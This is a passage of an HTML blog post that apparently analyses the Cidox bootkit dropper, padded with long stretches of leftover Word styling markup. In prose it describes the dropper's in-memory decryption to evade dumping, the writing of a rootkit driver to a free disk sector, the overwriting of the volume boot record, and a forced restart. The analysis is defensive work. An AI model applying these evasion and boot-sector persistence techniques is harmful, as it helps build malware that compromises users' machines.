UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Instead
of directly decrypting parts of itself, the dropper allocates memory multiple
times, decrypts and uses those portion in memory to transfer execution. It is
obvious that it uses this jumping technique to avoid third party programs to
easily dump Cidox in memory.</span></span></div>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRvpeyxlavbjPwAcfL_p8sgUHogt2hXY-JZexsMI3X49nsypF3G6DqV5kzH030Yj__1W-2-cKvSRzl2U8lsvE8mgAHvIgkdUi-jPUZraFzu10fKmQMYOX5LHKJBmAXYBMpsyiZ9tvQN6E/s1600/allocatedxfer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRvpeyxlavbjPwAcfL_p8sgUHogt2hXY-JZexsMI3X49nsypF3G6DqV5kzH030Yj__1W-2-cKvSRzl2U8lsvE8mgAHvIgkdUi-jPUZraFzu10fKmQMYOX5LHKJBmAXYBMpsyiZ9tvQN6E/s400/allocatedxfer.jpg" width="400" /></a></span></div>
<div style="text-align: center;">
<i><span style="font-family: Times,"Times New Roman",serif;">Passing of execution</span></i></div>
<br />
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: small;">Cidox carries 2 versions of rootkit drivers within itself. It chooses either one of these depending on the version of windows of the infected system. It will perform some checks and verify
whether
it is 32bit or 64bit platform. It then saves the result in a memory location, and "drops" the file by writing it directly to the free sector of the hard disk.</span></span><br />
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div style="text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbZQ9Txbm9n-0FYU4YA0eNZdDu22mVcncIfgmS3avewSxgXHKNFhgTJBW6Eb7JQWeDghRy6Urf1kAtY3jZ8uIKdt-aADSioMkHDYMu7ZsYCpjbby2MK-BFE365q_OR7XBZ6u6D-dHGJgY/s1600/rootkitwritten.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbZQ9Txbm9n-0FYU4YA0eNZdDu22mVcncIfgmS3avewSxgXHKNFhgTJBW6Eb7JQWeDghRy6Urf1kAtY3jZ8uIKdt-aADSioMkHDYMu7ZsYCpjbby2MK-BFE365q_OR7XBZ6u6D-dHGJgY/s400/rootkitwritten.jpg" width="400" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><i>Rootkit driver written to a free sector</i></span>
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><br />
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--></div>
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">At
this point, it will prepare to write directly to the hard disk by mounting it.
Saves the original volume boot partition to a random sector in the first disk, then
write the malicious boot loader directly to it. </span></span></div>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<span style="font-family: Times,"Times New Roman",serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0RV5QK2oavV1yef2ztgb8CFZj_qlG1MoK-BftD5bQViEPMAdQfL0EM4bMWKDgGxtPNTiW8m8nz3wlo2EfgRzDxHLUpmWgLsly1CQvY1vjPzTLXjhrWkwRdNv30_S-Q8zcH33gh8HG0Q0/s1600/hardrive0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0RV5QK2oavV1yef2ztgb8CFZj_qlG1MoK-BftD5bQViEPMAdQfL0EM4bMWKDgGxtPNTiW8m8nz3wlo2EfgRzDxHLUpmWgLsly1CQvY1vjPzTLXjhrWkwRdNv30_S-Q8zcH33gh8HG0Q0/s400/hardrive0.jpg" width="400" /></a></span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<div style="text-align: center;">
<i>Uses ZwCreateFile to mount and read/write directly to hard disk</i></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Finally, it will create and execute a small file with the specific purpose of forcing a
restart on the system. Immediately proceeding after this is the creation of a batch file for
changing attributes and deleting the small shutdown file.</span></span><br />
<br />
<br />
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--></span></span><br />
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
